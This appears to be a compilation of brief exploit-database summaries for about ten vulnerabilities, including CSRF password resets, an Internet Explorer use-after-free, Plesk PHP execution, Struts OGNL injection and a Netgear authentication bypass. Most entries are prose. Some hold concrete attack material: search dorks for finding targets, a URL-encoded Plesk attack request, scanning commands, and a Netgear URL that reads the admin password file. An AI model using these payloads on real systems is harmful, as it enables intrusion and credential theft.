This exploit allows an attacker to reset the admin password of AfterLogic WebMail Lite version <= 7.0.1 via Cross-Site Request Forgery (CSRF). The exploit can be found by searching for 'inurl:webmail/adminpanel/index.php?submit' using the DuckDuckGo search engine.
This exploit allows an attacker to reset the admin password of the php ticket system BETA 1 via Cross-Site Request Forgery (CSRF). The vulnerable URL is inurl:ticket/?p=process_change_password&id=1.
This module exploits a use-after-free vulnerability in Microsoft Internet Explorer where a DOM textNode pointer becomes corrupted after style computation. This pointer is then overwritten when the innerHTML property on the parent object is set.
Input sanitization is insufficient (or rather, completely absent), which leads to the injection of shell commands. It's possible to upload and execute a backdoor.
A security vulnerability was found in the Xpient POS system running an instance of Iris 3.8 software: the POS cash drawer can be remotely triggered to open if a malicious agent has access to the POS network and is allowed to send a crafted message to the POS terminal hosting the cash drawer. No authentication or encryption layer is required to exploit this vulnerability. As a result, the cash drawer opens and its content is physically accessible.
This Plesk configuration setting makes it possible: scriptAlias /phppath/ "/usr/bin/". Furthermore, this is not CVE-2012-1823, because the PHP interpreter is called directly (no PHP file is called). Parallels Plesk Remote Exploit -- PHP Code Execution and therefore Command Execution. Traces in /var/log/httpd/access_log: 192.168.74.142 - - [19/Mar/2013:18:59:41 +0100] "POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 203 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)". Shodanhq overview of Plesk on Linux: http://www.shodanhq.com/search?q=plesklin. perl plesk-simple.pl <ip address>. ./pnscan -w"GET /phppath/php HTTP/1.0rnrn" -r "500 Internal" 76.12.54.163/16 80. perl plesk-simple.pl 76.12.81.206.
This module exploits a remote command execution vulnerability in Apache Struts versions < 2.3.14.2. A specially crafted request parameter can be used to inject arbitrary OGNL code into the stack, bypassing Struts and OGNL library protections. When targeting an action that requires interaction through GET, the payload should be split, taking into account the URI limits. In this case, if the rendered JSP has more than one point of injection, it could result in payload corruption. This should happen only when the payload is larger than the URI length.
Attackers can leverage this vulnerability to bypass existing authentication mechanisms and execute arbitrary commands on the affected devices, with root privileges. Briefly, the embedded web server skips authentication checks for some URLs containing the "currentsetting.htm" substring. As an example, the following URL can be accessed even by unauthenticated attackers: http://<target-ip-address>/setup.cgi?currentsetting.htm=1. Then, the "setup.cgi" page can be abused to execute arbitrary commands. As an example, to read the /www/.htpasswd local file (containing the clear-text password for the "admin" user), an attacker can access the following URL: http://<target-ip-address>/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cat+/www/.htpasswd&curpath=/&currentsetting.htm=1. Basically, this URL leverages the "syscmd" function of the "setup.cgi" script to execute arbitrary commands. In the example above, the command being executed is "cat /www/.htpasswd", and the output is displayed in the resulting web page. Slight variations of this URL can be used to execute arbitrary commands.
SecureSphere Operations Manager is prone to a command-execution vulnerability. An attacker can exploit this issue to execute arbitrary commands in the context of the application.
DS3 Authentication Server (unknown version) is prone to a command execution vulnerability. The authentication server provides different admin tools to perform connectivity checks. TestTelnetConnection.jsp doesn't validate user input, allowing an attacker to execute arbitrary commands on the server side with the privileges of the asadmin user.